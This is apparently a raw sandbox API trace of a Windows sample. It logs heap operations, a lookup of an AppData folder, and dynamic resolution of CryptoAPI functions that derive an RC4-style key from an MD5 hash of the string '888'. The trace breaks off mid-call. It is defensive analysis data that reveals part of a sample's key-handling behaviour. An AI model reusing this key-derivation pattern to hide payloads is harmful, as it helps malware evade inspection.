[0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0203.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0203.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0203.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0203.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0203.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/TileDataLayer", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 0x9e21f8 [0203.211] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0203.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0203.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0203.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0203.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.217] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.217] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0203.217] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0203.217] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0203.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0203.218] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.219] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.219] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0203.219] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0203.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0203.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0203.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0203.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0203.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0203.220] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c7f8) returned 1 [0203.221] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.221] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0203.221] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0203.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0203.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0203.221] CryptCreateHash (in: hProv=0xa7c7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0203.222] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0203.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.222] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0203.222] CryptHashData (hHash=0x9e2138, pbData=0x2a719f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0203.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.222] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.222] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0203.222] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0203.222] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0203.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaad80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0203.222] CryptDeriveKey (in: hProv=0xa7c7f8, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0203.223] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0203.223] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0203.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0203.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0203.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0203.223] CryptDestroyHash (hHash=0x9e2138) returned 1 [0203.224] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/TileDataLayer" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.224] GetLastError () returned 0x5 [0203.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0203.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0203.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0203.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0203.225] RtlAllocateHeap (HeapHandle=0x2af0000, 